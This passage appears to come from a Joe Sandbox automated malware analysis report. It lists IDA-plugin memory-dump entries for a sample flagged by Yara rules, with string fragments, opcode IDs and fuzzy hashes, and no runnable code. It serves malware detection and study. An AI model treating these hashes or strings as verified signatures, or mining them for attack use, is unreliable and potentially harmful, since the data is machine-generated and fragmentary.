                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 8fae1d1f8506d91c6d9b0c01b8c31b09a388024a003236d4ab598d150c63d4bc
                                          • Instruction ID: be7291c6ef3115a17cd0e971f14169f860a9eb32a25abee4604c9b9b66aca5ec
                                          • Opcode Fuzzy Hash: 8fae1d1f8506d91c6d9b0c01b8c31b09a388024a003236d4ab598d150c63d4bc
                                          • Instruction Fuzzy Hash: 5A811972D016699BDB21CF54CC45BEABBB8AF18750F0041EAEA19B7640D7309E84CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 2474CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4_w@4_w
                                          • API String ID: 4062629308-713214301
                                          • Opcode ID: a03d511004bac8aaba79185b45326126bfa6f90a193bdfd3c3f24f05071f9c6e
                                          • Instruction ID: 57ce376dc466ff80ae2bd387eb97cb6d72351bb9ba723db3fe3532a3ef534079
                                          • Opcode Fuzzy Hash: a03d511004bac8aaba79185b45326126bfa6f90a193bdfd3c3f24f05071f9c6e
                                          • Instruction Fuzzy Hash: 54417B72D00214DFDB21CFA5D880ABABBF8EF54B00F01452AE965EB368D7749941CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: M$!g$$$'$0)$9b$9t$;$EN$F"$J$M3$N9$Py$R$cz$e$j$p$qr$qu$t$t<$t~
                                          • API String ID: 0-3062056613
                                          • Opcode ID: 33e26cb7874dfe04a5482fa9bb1b868d0cc66c401359d7ca49b7b608e408890c
                                          • Instruction ID: f8c28991b739adeede1196b5fa1319320a7fdce0d4bf7ad73867b042db7175d2
                                          • Opcode Fuzzy Hash: 33e26cb7874dfe04a5482fa9bb1b868d0cc66c401359d7ca49b7b608e408890c
                                          • Instruction Fuzzy Hash: 3542C2B0E05229CBEB24CF48C898BEDBBB6BB45308F1481D9C449AB381D7B55E85CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6$O$S$\$s
                                          • API String ID: 0-3854637164
                                          • Opcode ID: 5691b6534a1dce0602d1d5c3b45c8bb8059f9411bf096bd3208051d9a1d93dc2
                                          • Instruction ID: f24fac5528fd1929367c8682b36e4d5d83bd556def9631bf07394a109dc99237
                                          • Opcode Fuzzy Hash: 5691b6534a1dce0602d1d5c3b45c8bb8059f9411bf096bd3208051d9a1d93dc2
                                          • Instruction Fuzzy Hash: 5E41A6B2A00219BADB10EF98EC48FEBF7F8EB44314F404199ED09D6101E775AE548BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-190826338
                                          • Opcode ID: bf309b7dfbb9ad93272831be700a4d939e22b28fb28fef1d4121078c135fd964
                                          • Instruction ID: 394284b865f2fc4a8b55a81d6056e42441ff8f5463cf02964c8cf92cea1bd89a
                                          • Opcode Fuzzy Hash: bf309b7dfbb9ad93272831be700a4d939e22b28fb28fef1d4121078c135fd964
                                          • Instruction Fuzzy Hash: F501C9B6D01218AEDB40DFE8D9449EEBBF8AB08600F14426AD915F3241F7715A04CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 392fe12960d5466754fd46979948481a0700562cf443d6085a039829ab8312f5
                                          • Instruction ID: 08d368735fd3122b1b270e72859094817c9ae2f836df3f8e49330ef26a2126a8
                                          • Opcode Fuzzy Hash: 392fe12960d5466754fd46979948481a0700562cf443d6085a039829ab8312f5
                                          • Instruction Fuzzy Hash: 97411FB1D11219AFDB00CF99DC85AEEBBBCEF48750F10455AF914E6241E7B09A40CBE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d12705000e9f587d9e439cbdeec7697adfadc95c26c4482fadc74e5feac4106f
                                          • Instruction ID: cff0357c67ce5838c6069a01077fdb72e4004a935bb60f59925f9303d6e8f6e6
                                          • Opcode Fuzzy Hash: d12705000e9f587d9e439cbdeec7697adfadc95c26c4482fadc74e5feac4106f
                                          • Instruction Fuzzy Hash: D231D6B5A10249ABCB14DF98D881EEFB7F9EF88304F108619FD09A7240D670A851CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                          • API String ID: 0-3248090998
                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                          • API String ID: 0-1002149817
                                          • String ID: M$!g$$$'$0)$9b$9t$;$EN$F"$J$M3$N9$Py$R$cz$e$j$p$qr$qu$t$t<$t~
                                          • API String ID: 0-3062056613
                                          • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                          • API String ID: 0-3236418099
                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                          • API String ID: 0-392141074
                                          • Opcode ID: 02c41372fb38ae15f98df98ddb8e0c5f659bf95774302d9236992eb6baaa0583
                                          • Instruction ID: dd53e4a0b417b12e33f9afdddfeab759526ea8be81abef2106e14d0b7cb4f959
                                          • Opcode Fuzzy Hash: 02c41372fb38ae15f98df98ddb8e0c5f659bf95774302d9236992eb6baaa0583
                                          • Instruction Fuzzy Hash: 017164B2E00318AADB15EB94CC44FEEB7BCBF04704F44419DEA08E6141EB746B448FA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                          • API String ID: 0-392141074
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                          • API String ID: 0-2356907671
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                          • API String ID: 0-685823316
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: :$:$:$A$I$N$P$m$s$t
                                          • API String ID: 0-2304485323
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: *$-$M$`$p$r$v$x
                                          • API String ID: 0-1524397677
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: L$S$\$a$c$e$l
                                          • API String ID: 0-3322591375
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: F$P$T$f$r$x
                                          • API String ID: 0-2523166886
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $i$l$o$u
                                          • API String ID: 0-2051669658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o
                                          • API String ID: 0-3624523832
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$h$o
                                          • API String ID: 0-3662636641
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o
                                          • API String ID: 0-3624523832
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$h$o
                                          • API String ID: 0-3662636641
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o
                                          • API String ID: 0-3624523832
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: -$JWD]$KALY$KALY
                                          • API String ID: 0-2270481156
                                          Uniqueness

                                          Uniqueness Score: -1.00%